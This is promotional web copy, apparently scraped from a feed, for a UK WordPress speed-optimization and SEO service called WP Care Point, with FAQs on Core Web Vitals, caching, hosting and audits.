Why accept a less-than-stellar result when you could use the No. 1 solution to help you comply with Google’s Core Web Vitals? You can join the other 52% of WP Care Point consumers who have:

✔ Consistently met the Core Web Vitals established by Google;

✔ Exceeded the most demanding Core Web Vitals LCP!

✔ Remain on target with changes made by Google to its core web standards.

Achieving a 90+ Page Speed score

Our WP Care Point Performance Service offers help to assist you in getting your page from the “red zone” to a “90+ PageSpeed Score”, taking over the performance score by providing support in removing all PageSpeed Insight (PSI) warnings with these offerings:

✔ No need for code (just plug & play)

✔ Eliminating your frustration through trial and error

✔ Providing results instantly for both mobile & desktop designs.

A website must be completely loaded in under 3 seconds.

Users will abandon a website after 3 seconds of waiting for its content to appear on the browser; 90.3% of WP Care Point sites load in 2.75 seconds or less. The benefits of this statistic include:

✔ Increasing their website ranking in search engines (SEO)

✔ Providing users with instant access to pages

✔ Establishing trust with customers who expect fast loading times on websites

How Can We Assist You?

Free Core Web Vitals Report

You will receive a report at no charge that lists how well your website performs according to users’ real-life experiences.

Request for Audit

Free Core Web Vitals Report

You will receive a report at no charge that lists how well your website performs according to users’ real-life experiences.

Request for Audit

Site Speed Audit at No Charge!

Learn how our Speed Solutions Services can assist you through an audit and gap analysis provided by an expert at no cost to you.

Request for Audit

FREE WordPress Speed Tester

Get a measurement of how your site performs, plus suggestions on ways to improve it within 90 seconds at no cost, with our AI WordPress Speed Testing Tool!

Request for Audit

Obtain assistance from our experts with site speed.

Discover information about our Audit, Consult, and Implementation Services, our fastest growing speed optimization service.

Request for Audit

Get assistance from our experts with SEO.

With a combination of Technical and On-Site SEO Audits, get a complete SEO Action Plan.

Request for Audit
Fix Slow WordPress Website Speed Optimization Service UK
WP Care Point

Frequently Asked Questions (FAQ)

A WordPress Speed Optimization service is a service that improves loading times as well as the overall performance of a site that has been built using the WordPress platform. Examples of these services could be optimising the code, images, plugins, databases etc.. in order to make the web page work faster and more responsively and improving Google’s core web vitals.

Examples of methods of accomplishing these would be to: install a WordPress caching plugin, improve your web hosting, optimize your images, clean your WordPress database, and improve the overall performance of the website.

To optimize the speed of your WordPress site, you'll need to implement a combination of server-side and client-side methods. Server-side methods include the use of file compression, caching (both on the server and within the database), and scheduling the loading of off-screen images. Examples of client-side optimization include the use of browser caching, minifying of files, and optimizing images. You can see our process for optimizing WordPress speed elsewhere on this page.

There are many reasons why WordPress Speed Optimization is important. One reason is that slow-loading web pages will frustrate your visitors; the less time it takes for your page to load, the better. When people go to a poorly optimized website, they are likely to leave rather than continue browsing. In addition to frustration, a poorly optimized website may result in fewer visitors returning to that site; this would have a negative impact on search engine optimization (SEO) rankings.

Anyone operating a website through an open source CMS, like WordPress, will definitely want to utilize the services of an expert in WordPress Speed Optimization. A website with a high level of user engagement is critical for complete success when ranking your site by Google; improving your website's speed will help improve your rank for searches with Google.

To determine whether or not your website needs optimization, you can conduct a speed test on your site using tools such as Google's PageSpeed Insights and /or WebPageTest.org, which will provide an analysis of the current speed status of your site and whether or not there is a need for any optimization. You can also schedule a FREE website audit by clicking here, where our team will evaluate your current site speed and diagnose the leading reasons for any speed problems. If your website plays an important role in promoting your business to the internet via Google Ads, Facebook Ads, SEO, or email marketing, then speed optimization can improve user experience.

These services utilize expert methods and techniques to help increase the loading time of your WordPress site. When your site loads faster, users will have a better user experience on your site, and you may also receive a better ranking in search engines. 

However, there are always some risks involved with Speed Optimization Service Providers that can lead to problems within your website, such as broken/corrupt websites or pages and/or compromised website security due to bad coding practices utilized for page speed optimization; therefore, when selecting the right Speed Optimization Service Provider, you should look for one that is reputable (has a good reputation), can provide proof of their testing methods to establish if the method will work efficiently when applied to your live site (verifying how well it has worked on a staging site), and will only use proven Speed Optimization Methods by double-checking/test running the methods before applying them to your website.

Certainly! We provide complimentary transfer services for any of our WordPress hosting options.

We utilize Cloudways for hosting and supporting all of our customers due to their superior speed, quality support, and commitment to speed.

During the website seed audit process, we will evaluate your hosting environment and make suggestions on how we can help alleviate any issues caused by poor performance from your current host. You'll have multiple options ranging from basic shared hosting, dedicated hosting, or even auto scale hosting for high traffic sites.

Click here to learn more about our managed WordPress Hosting Solutions.

Yes! You can submit a request for a free site speed audit.

For site speed audits, we will utilize Google Page Speed Insights and other speed testing services as part of your audit to determine the speed rating of your website.

During your audit, we will conduct a site speed test to analyze your website's performance and speed score on both desktop and mobile devices, as well as your Core Web Vitals and rank the key issues that need improvement with regard to WordPress performance optimization.

We specialize in making your website load as quickly as possible. We never give out false claims about how fast your website will load or how quickly it can be improved until after we have an evaluation of your current web page.

The main reason for this is that no two WordPress websites are identical, and there are several variables that can affect the load speed of your site. To illustrate this, a shared hosting account with many Google Ads linked to different third-party sites could slow down your site's load time.

However, once you have consulted with our website loading speed experts and made sure your site is hosted correctly and utilized our website loading speed optimization methods, you should be able to achieve a load time of less than 2 seconds easily.

Yes, a one time speed optimization is available to give your website a speed boost. If we notice there are multiple areas of speed issues, we might suggest a one time optimization along with ongoing speedy support, depending on what type of support plan you select.

Without ongoing speed optimization, your website's speed will slowly decrease as changes are made to your site, new content is uploaded and new functionality is added. We have seen this happen repeatedly.

Most projects are completed within 2–5 business days depending on site complexity.

No. Optimization focuses on backend performance and code refinement without altering design.

Yes. We specialize in WooCommerce performance tuning including checkout and cart optimization.

Yes. Ongoing performance monitoring ensures long-term Core Web Vitals stability.

Performance depends on hosting and structure, but most sites achieve load times under 2 seconds after professional optimization.

Fix Slow WordPress Website Speed Optimization Service UK
Fix Slow WordPress Website Speed Optimization Service UK
Fix Slow WordPress Website Speed Optimization Service UK
]]> https://wpcarepoint.co.uk/blog/wp-website-speed-optimization-service-uk/feed/ 0 WordPress Optimization Services | WP Care Point https://wpcarepoint.co.uk/blog/wordpress-optimization-services-uk/ https://wpcarepoint.co.uk/blog/wordpress-optimization-services-uk/#respond Sun, 01 Feb 2026 15:25:17 +0000 https://wpcarepoint.co.uk/?p=24688

WordPress Optimization Services: The Ultimate Guide to Performance

Professional WordPress optimization services ensure your website loads instantly, ranks higher on search engines, and provides a seamless user experience for UK-based audiences. By refining code, compressing assets, and leveraging advanced caching, these services eliminate technical bottlenecks that hinder business growth.

Key Takeaways

  • Speed Impacts Revenue: A one-second delay can reduce conversions by up to 20%.
  • Core Web Vitals: Google uses LCP, FID, and CLS as primary ranking factors.
  • Security Integration: Optimization includes hardening WordPress against UK-specific cyber threats.
  • Scalability: Professional WordPress optimization prepares your site for high traffic surges.

Specific Key Takeaways

  • Faster WordPress websites rank higher on Google UK

  • Optimized sites convert more visitors into customers

  • Performance, SEO, and security are deeply connected

  • UK-based hosting, GDPR, and Core Web Vitals matter

  • Professional optimization prevents long-term revenue loss

What are WordPress optimization services and why do UK businesses need them?

WordPress optimization services are professional processes that improve website speed, performance, SEO, security, and user experience to meet Google standards and UK user expectations.

What problems do optimized WordPress websites face in the UK market?

UK businesses operating with poorly optimized WordPress sites typically experience slower load times, declining Google rankings, and higher bounce rates.

Common issues include:

  • Failing Core Web Vitals (LCP, INP, CLS)

  • Bloated themes and unnecessary plugins

  • Slow UK server response times

  • Poor mobile performance

  • Security vulnerabilities affecting SEO trust

According to Google, a 1-second delay in page load can reduce conversions by up to 20%, a critical issue for competitive UK industries such as legal services, eCommerce, and local trades.

Why are WordPress optimization services essential for UK businesses?

In the competitive digital landscape of the United Kingdom, user patience is at an all-time high, but tolerance for slow websites is at an all-time low. WordPress optimization services are no longer a luxury; they are a fundamental requirement for any business operating a CMS-based platform. When a site is professionally optimized, it addresses the underlying database bloat and unoptimized scripts that standard plugins often miss.

WordPress Optimization Services

Statistics show that 47% of consumers expect a web page to load in 2 seconds or less. For a WordPress site, this requires a specialized approach involving server-side tweaks and front-end refinement. At WP Care Point, we focus on reducing the Time to First Byte (TTFB), ensuring that your UK audience receives data from the server as quickly as possible.

How does WordPress website optimization improve search engine rankings?

Search engines, particularly Google, prioritize user experience. WordPress website optimization directly influences your “Page Experience” score. When you invest in professional WordPress optimization, you are essentially telling search engines that your site is healthy, fast, and reliable

Comparison: WP Care Point vs. Standard Providers

Feature

WP Care Point

Standard Providers

Initial Audit

Deep Manual & AI Analysis

Automated Plugin Scan

Database Cleanup

Manual Query Optimization

Basic Plugin Run

CDN Setup

UK-Optimized Edge Servers

Global Default Only

Core Web Vitals

90+ Score Guaranteed

“Best Effort” Basis

Security Patching

Included in Optimization

Extra Charge

What are the core components of WordPress speed optimization services?

To achieve elite performance, WordPress speed optimization services must look beyond simple image compression. The process involves a multi-layer strategy:

  1. Gzip and Brotli Compression: Reducing the size of your HTML, CSS, and JavaScript files.
  2. Minification: Removing unnecessary characters from code without changing functionality.
  3. Advanced Caching: Implementing object caching and page caching to serve static versions of pages.
  4. Database Optimization: Cleaning up overhead, old revisions, and expired transients.

By focusing on WordPress SEO and speed optimization, WP Care Point ensures that every element of your site is lean. This technical hygiene allows Google’s crawlers to index your site more efficiently, utilizing your “crawl budget” effectively.

Which technical factors define professional WordPress optimization?

Professional WordPress optimization requires an understanding of how WordPress interacts with the Linux server environment (LAMP/LEMP stacks). It isn’t just about the dashboard; it’s about PHP versions, SQL execution times, and memory limits.

WordPress Optimization Services

For UK businesses, latency is a critical factor. Using WordPress optimization services that understand the local infrastructure ensures that your site is hosted and cached in locations closest to your primary demographic, such as London or Manchester.

How did WordPress optimization services evolve over time?

How was WordPress optimization handled in the past?

Earlier optimization focused mainly on:

  • Basic caching plugins

  • Image compression only

  • Shared hosting limitations

This approach worked when Google ranking signals were simpler.

What defines modern WordPress optimization services today?

Today’s WordPress optimization services are data-driven and algorithm-aware, including:

  • Core Web Vitals optimisation

  • Server-level tuning

  • Database and PHP optimization

  • UX and accessibility improvements

SEO + performance integration

Why are WordPress optimization services essential
for Google rankings in the UK?

Google UK prioritises:

  • Page experience

  • Mobile usability

  • Local relevance

  • Security (HTTPS, clean code)

WordPress performance optimization directly impacts crawl budget efficiency, indexation speed, and ranking stability.

What does professional WordPress optimization include?

How does WordPress website optimization improve speed?

  • Advanced caching configuration

  • Image delivery via CDN

  • Lazy loading and font optimisation

  • UK-based server tuning

How do WordPress speed optimization services affect conversions?

Fast-loading pages reduce bounce rates and increase trust—especially for UK mobile users.

How is WordPress SEO and speed optimization connected?

SEO without performance fails Core Web Vitals, while speed without SEO lacks visibility. Professional WordPress optimization aligns both.

WordPress Optimization Services

How has the landscape of WordPress performance optimization evolved?

The Past: Basic Caching and Desktop Focus

A decade ago, WordPress performance optimization was limited to installing a caching plugin and resizing a few images. Mobile traffic was an afterthought, and Google’s algorithms were less sophisticated regarding technical debt.

The Present: Core Web Vitals and Mobile-First

Today, WordPress optimization services must prioritize mobile responsiveness and “interaction to next paint” (INP). We are currently in an era where security and speed are intertwined; a slow site is often a vulnerable one.

The Future: AI-Driven and Headless Integration

Looking forward, the future of WordPress optimization services lies in AI-driven predictive loading and Headless WordPress architectures. By decoupling the front-end from the back-end using frameworks like React or Next.js, WP Care Point is already preparing clients for a “sub-zero” load time reality where pages appear to load before the user even clicks.

Can WordPress SEO and speed optimization be handled simultaneously?

Yes, and they should be. WordPress SEO and speed optimization are two sides of the same coin. A fast site that lacks metadata will not rank, and a perfectly keyword-optimized site that takes 10 seconds to load will be penalized.

When WP Care Point performs WordPress optimization services, we ensure that:

  • Images have proper Alt tags and are in WebP format.
  • The DOM size is minimized to prevent “Layout Shift.”
  • Scripts are deferred so they don’t block the rendering of the content.
WordPress Optimization Services

Frequently Asked Questions

What is the primary goal of WordPress optimization services?

The primary goal is to improve user experience and search engine visibility by reducing page load times, optimizing database efficiency, and ensuring the site meets Google’s Core Web Vitals standards.

How often should I invest in professional WordPress optimization?

Optimization should be an ongoing process. However, a deep technical audit and optimization should be performed at least once a quarter to clear database bloat and update performance protocols.

Will WordPress speed optimization services break my website design?

No. Professional optimization involves testing changes in a staging environment. At WP Care Point, we ensure that CSS and JS minification do not interfere with your site’s visual layout or functionality.

Does a faster WordPress site really help with UK SEO?

Absolutely. Google explicitly uses speed as a ranking factor. In the UK market, where competition is high, a faster site provides a significant edge in the Search Engine Results Pages (SERPs).

What is the difference between a plugin and professional WordPress optimization?

Plugins provide a “one-size-fits-all” fix. Professional services involve manual code audits, server-level configurations, and bespoke database cleaning that plugins cannot safely execute.

Conclusion

Trusting WP Care Point for Your Digital Growth

Navigating the complexities of modern web performance requires more than just basic tools; it requires expertise. WordPress optimization services are an investment in your brand’s credibility and your bottom line. By choosing WP Care Point, you are partnering with a UK-centric team dedicated to squeezing every millisecond of performance out of your platform. Whether you need WordPress website optimization or a complete overhaul of your WordPress performance optimization strategy, we provide the technical excellence required to dominate the SERPs.

Who should you trust for WordPress optimization services?

If your website serves the UK market, investing in WordPress optimization services is no longer optional, it’s essential.

WP Care Point delivers reliable, scalable, and future-proof WordPress optimization solutions tailored specifically for UK businesses that want faster websites, higher rankings, and better conversions.

]]> https://wpcarepoint.co.uk/blog/wordpress-optimization-services-uk/feed/ 0